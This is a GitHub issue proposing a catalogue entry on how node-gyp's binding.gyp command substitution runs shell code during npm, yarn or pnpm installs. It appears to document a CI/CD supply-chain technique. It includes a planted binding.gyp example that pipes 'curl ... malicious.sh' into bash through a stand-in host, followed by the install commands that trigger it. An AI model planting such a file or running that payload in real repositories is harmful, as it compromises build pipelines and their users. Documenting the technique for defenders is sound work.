Skip to content

[LOTP] Add node-gyp #133

Description

@fproulx-boostsecurity

As discussed with @piergiorgioladisa and in response to Miasma campaign abuse this LOTP. Aikido wrote an article https://www.aikido.dev/blog/exploring-binding-gyp-npm-build-system

Slop AI draft below

node-gyp description: Node.js native addon build tool tags:

  • cli
  • config-file
  • eval-sh

node-gyp

node-gyp is a cross-platform command-line tool written in Node.js for compiling native addon modules. It is bundled with npm and gets implicitly invoked when a binding.gyp file is present during dependency resolution.

Arbitrary Code Execution

node-gyp evaluates shell commands by design via Command Substitution in .gyp configuration files. It uses the <!(...) syntax to execute shell commands and capture their output during the build configuration phase.

Because package managers like npm, yarn, and pnpm automatically trigger node-gyp rebuild when they detect a binding.gyp file in the project directory, an attacker can achieve arbitrary code execution in the pipeline merely by planting this file. This completely bypasses traditional checks for malicious preinstall or postinstall scripts in package.json.

Planted binding.gyp Configuration

Create a binding.gyp file in the repository root (or anywhere a package manager resolves dependencies). When node-gyp parses this file, it will execute the shell command embedded within the <!(...) block.

{
"targets": [
{
"target_name": "lotp",
"type": "none",
"sources": ["<!(curl -s [https://example.com/malicious.sh\](https://example.com/malicious.sh) | bash)"]
}
]
}

Triggering Execution:

Code execution is triggered when the pipeline attempts to configure or build the project.

Explicit execution:

node-gyp configure
# or
node-gyp rebuild

Implicit execution (most common in CI/CD pipelines via package managers):

npm install
# or
npm ci
# or
yarn install

Activity

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Metadata

Metadata

Assignees

No one assigned

    Labels

    Type

    No type

    Projects

    No projects

      Milestone

      No milestone

      Relationships

      None yet

      Development

      No branches or pull requests

      Issue actions